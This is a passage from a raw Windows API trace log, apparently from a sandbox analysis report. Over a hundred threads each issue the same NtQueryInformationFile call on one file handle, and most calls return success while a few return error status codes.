515 os_tid = 0x220 [0161.686] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff18, FileInformation=0x208e20) returned 0x0 Thread: id = 516 os_tid = 0xb04 [0161.689] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fea0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fea0, FileInformation=0x208e20) returned 0x0 Thread: id = 517 os_tid = 0x180 [0161.690] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8b8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8b8, FileInformation=0x208e20) returned 0x0 Thread: id = 518 os_tid = 0x53c [0161.692] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd68, FileInformation=0x208e20) returned 0x0 Thread: id = 519 os_tid = 0x5b4 [0161.694] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb00, FileInformation=0x208e20) returned 0x0 Thread: id = 520 os_tid = 0x614 [0161.703] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff00, FileInformation=0x208e20) returned 0x0 Thread: id = 521 os_tid = 0x690 [0161.705] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe20, FileInformation=0x208e20) returned 0x0 Thread: id = 522 os_tid = 0x440 [0161.713] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd70, FileInformation=0x208e20) returned 0x0 Thread: id = 523 os_tid = 0x7d8 [0161.715] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f988, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f988, FileInformation=0x208e20) returned 0x0 Thread: id = 524 os_tid = 0xa60 [0161.717] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f898, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f898, FileInformation=0x208e20) returned 0x0 Thread: id = 525 os_tid = 0xb24 [0161.719] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fbd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fbd8, FileInformation=0x208e20) returned 0x0 Thread: id = 526 os_tid = 0x878 [0161.721] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc38, FileInformation=0x208e20) returned 0x0 Thread: id = 527 os_tid = 0xb1c [0161.723] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f7e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f7e8, FileInformation=0x208e20) returned 0x0 Thread: id = 528 os_tid = 0xb08 [0161.724] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff908, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff908, FileInformation=0x208e20) returned 0x0 Thread: id = 529 os_tid = 0x4fc [0161.726] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361faf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361faf0, FileInformation=0x208e20) returned 0x0 Thread: id = 530 os_tid = 0x4dc [0161.728] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fae0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fae0, FileInformation=0x208e20) returned 0x0 Thread: id = 531 os_tid = 0x43c [0161.730] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfda0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfda0, FileInformation=0x208e20) returned 0x0 Thread: id = 532 os_tid = 0x1c4 [0161.732] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fa18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fa18, FileInformation=0x208e20) returned 0x0 Thread: id = 533 os_tid = 0xbec [0161.734] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7d8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7d8, FileInformation=0x208e20) returned 0x0 Thread: id = 534 os_tid = 0xb48 [0161.736] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff850, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff850, FileInformation=0x208e20) returned 0x0 Thread: id = 535 os_tid = 0x5bc [0161.738] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb68, FileInformation=0x208e20) returned 0x0 Thread: id = 536 os_tid = 0x6b8 [0161.739] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe28, FileInformation=0x208e20) returned 0x0 Thread: id = 537 os_tid = 0x2dc [0161.741] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fec8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fec8, FileInformation=0x208e20) returned 0x0 Thread: id = 538 os_tid = 0x158 [0161.743] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff820, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff820, FileInformation=0x208e20) returned 0x0 Thread: id = 539 os_tid = 0x6cc [0161.745] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f970, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f970, FileInformation=0x208e20) returned 0x0 Thread: id = 540 os_tid = 0x694 [0161.747] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcd0, FileInformation=0x208e20) returned 0x0 Thread: id = 541 os_tid = 0x6d8 [0161.749] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfcf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfcf0, FileInformation=0x208e20) returned 0x0 Thread: id = 542 os_tid = 0x87c [0161.758] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd90, FileInformation=0x208e20) returned 0x0 Thread: id = 543 os_tid = 0xb88 [0161.760] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc48, FileInformation=0x208e20) returned 0x0 Thread: id = 544 os_tid = 0xb8c [0161.766] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb08, FileInformation=0x208e20) returned 0x0 Thread: id = 545 os_tid = 0x700 [0161.771] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa58, FileInformation=0x208e20) returned 0x0 Thread: id = 546 os_tid = 0x6f0 [0161.773] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f958, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f958, FileInformation=0x208e20) returned 0x0 Thread: id = 547 os_tid = 0x130 [0161.775] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc50, FileInformation=0x208e20) returned 0x0 Thread: id = 548 os_tid = 0x754 [0161.777] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fde0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fde0, FileInformation=0x208e20) returned 0x0 Thread: id = 549 os_tid = 0x72c [0161.779] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fde0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fde0, FileInformation=0x208e20) returned 0x0 Thread: id = 550 os_tid = 0x748 [0161.781] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffcc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffcc0, FileInformation=0x208e20) returned 0x0 Thread: id = 551 os_tid = 0x928 [0161.783] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa68, FileInformation=0x208e20) returned 0x0 Thread: id = 552 os_tid = 0xcc [0161.784] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f8a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f8a8, FileInformation=0x208e20) returned 0x0 Thread: id = 553 os_tid = 0xd0 [0161.786] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f790, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f790, FileInformation=0x208e20) returned 0x0 Thread: id = 554 os_tid = 0xd4 [0161.788] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff38, FileInformation=0x208e20) returned 0x0 Thread: id = 555 os_tid = 0xd8 [0161.790] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa10, FileInformation=0x208e20) returned 0x0 Thread: id = 556 os_tid = 0xdc [0161.792] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373feb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373feb0, FileInformation=0x208e20) returned 0x0 Thread: id = 557 os_tid = 0xe0 [0161.794] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff80, FileInformation=0x208e20) returned 0x0 Thread: id = 558 os_tid = 0xe4 [0161.796] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fee0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fee0, FileInformation=0x208e20) returned 0x0 Thread: id = 559 os_tid = 0xe8 [0161.798] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fe28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fe28, FileInformation=0x208e20) returned 0x0 Thread: id = 560 os_tid = 0xec [0161.800] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8e8, FileInformation=0x208e20) returned 0x0 Thread: id = 561 os_tid = 0x9d8 [0161.802] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd60, FileInformation=0x208e20) returned 0x0 Thread: id = 562 os_tid = 0x898 [0161.804] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8d0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8d0, FileInformation=0x208e20) returned 0x0 Thread: id = 563 os_tid = 0x48c [0161.806] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa78, FileInformation=0x208e20) returned 0x0 Thread: id = 564 os_tid = 0x6a4 [0161.808] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fdd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fdd8, FileInformation=0x208e20) returned 0x0 Thread: id = 565 os_tid = 0x20c [0161.810] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffce8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffce8, FileInformation=0x208e20) returned 0x0 Thread: id = 566 os_tid = 0x704 [0161.812] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f8d8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f8d8, FileInformation=0x208e20) returned 0x0 Thread: id = 567 os_tid = 0x568 [0161.814] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fbd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fbd8, FileInformation=0x208e20) returned 0x0 Thread: id = 568 os_tid = 0x5ac [0161.816] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd98, FileInformation=0x208e20) returned 0x0 Thread: id = 569 os_tid = 0x908 [0161.818] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffdd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffdd8, FileInformation=0x208e20) returned 0x0 Thread: id = 570 os_tid = 0x888 [0161.820] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb78, FileInformation=0x208e20) returned 0x0 Thread: id = 571 os_tid = 0x544 [0161.822] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7c0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7c0, FileInformation=0x208e20) returned 0x0 Thread: id = 572 os_tid = 0x76c [0161.824] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfee0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfee0, FileInformation=0x208e20) returned 0x0 Thread: id = 573 os_tid = 0xa9c [0161.831] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb90, FileInformation=0x208e20) returned 0x0 Thread: id = 574 os_tid = 0x114 [0161.833] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f818, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f818, FileInformation=0x208e20) returned 0x0 Thread: id = 575 os_tid = 0x5b8 [0161.835] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb30, FileInformation=0x208e20) returned 0x0 Thread: id = 576 os_tid = 0x814 [0161.841] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb48, FileInformation=0x208e20) returned 0x0 Thread: id = 577 os_tid = 0x834 [0161.843] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa40, FileInformation=0x208e20) returned 0x0 Thread: id = 578 os_tid = 0x884 [0161.845] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df870, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df870, FileInformation=0x208e20) returned 0x0 Thread: id = 579 os_tid = 0x5d4 [0161.847] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff9c8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff9c8, FileInformation=0x208e20) returned 0x0 Thread: id = 580 os_tid = 0x340 [0161.849] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f7e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f7e8, FileInformation=0x208e20) returned 0x0 Thread: id = 581 os_tid = 0x810 [0161.851] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb30, FileInformation=0x208e20) returned 0x0 Thread: id = 582 os_tid = 0x830 [0161.853] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc18, FileInformation=0x208e20) returned 0x0 Thread: id = 583 os_tid = 0x880 [0161.854] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff58, FileInformation=0x208e20) returned 0x0 Thread: id = 584 os_tid = 0xae4 [0161.856] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb40, FileInformation=0x208e20) returned 0x0 Thread: id = 585 os_tid = 0x570 [0161.858] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd68, FileInformation=0x208e20) returned 0x0 Thread: id = 586 os_tid = 0xb40 [0161.860] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe30, FileInformation=0x208e20) returned 0x0 Thread: id = 587 os_tid = 0x5f4 [0161.862] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fde8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fde8, FileInformation=0x208e20) returned 0x0 Thread: id = 588 os_tid = 0xbb8 [0161.863] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe10, FileInformation=0x208e20) returned 0x0 Thread: id = 589 os_tid = 0x598 [0161.865] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9a0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9a0, FileInformation=0x208e20) returned 0x0 Thread: id = 590 os_tid = 0x4e4 [0161.867] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc70, FileInformation=0x208e20) returned 0x0 Thread: id = 591 os_tid = 0xbfc [0161.869] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe28, FileInformation=0x208e20) returned 0x0 Thread: id = 592 os_tid = 0x80c [0161.871] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fcb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fcb0, FileInformation=0x208e20) returned 0x0 Thread: id = 593 os_tid = 0xbf8 [0161.873] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe58, FileInformation=0x208e20) returned 0x0 Thread: id = 594 os_tid = 0x524 [0161.875] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fbb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbb8, FileInformation=0x208e20) returned 0x0 Thread: id = 595 os_tid = 0x674 [0161.877] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa10, FileInformation=0x208e20) returned 0x0 Thread: id = 596 os_tid = 0x4a0 [0161.879] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe18, FileInformation=0x208e20) returned 0x0 Thread: id = 597 os_tid = 0x5d8 [0161.881] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff40, FileInformation=0x208e20) returned 0x0 Thread: id = 598 os_tid = 0x69c [0161.882] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fab0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fab0, FileInformation=0x208e20) returned 0x0 Thread: id = 599 os_tid = 0x6a8 [0161.884] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc28, FileInformation=0x208e20) returned 0x0 Thread: id = 600 os_tid = 0x500 [0161.887] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f830, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f830, FileInformation=0x208e20) returned 0x0 Thread: id = 601 os_tid = 0x4e0 [0161.888] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9c8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9c8, FileInformation=0x208e20) returned 0x0 Thread: id = 602 os_tid = 0x330 [0161.890] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357ff50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357ff50, FileInformation=0x208e20) returned 0x0 Thread: id = 603 os_tid = 0xa30 [0161.892] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8e0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8e0, FileInformation=0x208e20) returned 0x0 Thread: id = 604 os_tid = 0xb50 [0161.894] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffed0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffed0, FileInformation=0x208e20) returned 0x0 Thread: id = 605 os_tid = 0xb70 [0161.896] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa30, FileInformation=0x208e20) returned 0x0 Thread: id = 606 os_tid = 0xb6c [0161.900] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f970, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f970, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 607 os_tid = 0xb74 [0161.902] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa98, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 608 os_tid = 0xb68 [0161.904] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff70, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 609 os_tid = 0x758 [0161.906] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc58, FileInformation=0x208e20) returned 0x0 Thread: id = 610 os_tid = 0x3d4 [0161.908] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd60, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 611 os_tid = 0x484 [0161.910] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fef0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fef0, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 612 os_tid = 0xb4c [0161.912] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9f0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9f0, FileInformation=0x208e20) returned 0x0 Thread: id = 613 os_tid = 0xa1c [0161.914] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa50, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 614 os_tid = 0x2ac [0161.916] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbe8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbe8, FileInformation=0x208e20) returned 0x0 Thread: id = 615 os_tid = 0xa8c [0161.918] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc28, FileInformation=0x208e20) returned 0x0 Thread: id = 616 os_tid = 0x68c [0161.920] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf9d0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf9d0, FileInformation=0x208e20) returned 0x0 Thread: id = 617 os_tid = 0x388 [0161.921] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff20, FileInformation=0x208e20) returned 0x0 Thread: id = 618 os_tid = 0xa50 [0161.923] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f980, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f980, FileInformation=0x208e20) returned 0x0 Thread: id = 619 os_tid = 0x75c [0161.925] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f9f0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f9f0, FileInformation=0x208e20) returned 0x0 Thread: id = 620 os_tid = 0x240 [0161.927] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f790, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f790, FileInformation=0x208e20) returned 0x0 Thread: id = 621 os_tid = 0x320 [0161.929] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffba0, FileInformation=0x208e20) returned 0x0 Thread: id = 622 os_tid = 0x3b4 [0161.931] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa08, FileInformation=0x208e20) returned 0x0 Thread: id = 623 os_tid = 0x760 [0161.933] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff20, FileInformation=0x208e20) returned 0x0 Thread: id = 624 os_tid = 0xb00 [0161.935] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fe28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fe28, FileInformation=0x208e20) returned 0x0 Thread: id = 625 os_tid = 0x7fc [0161.936] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f798, FileInformation=0x208e20, Length=0x10000, 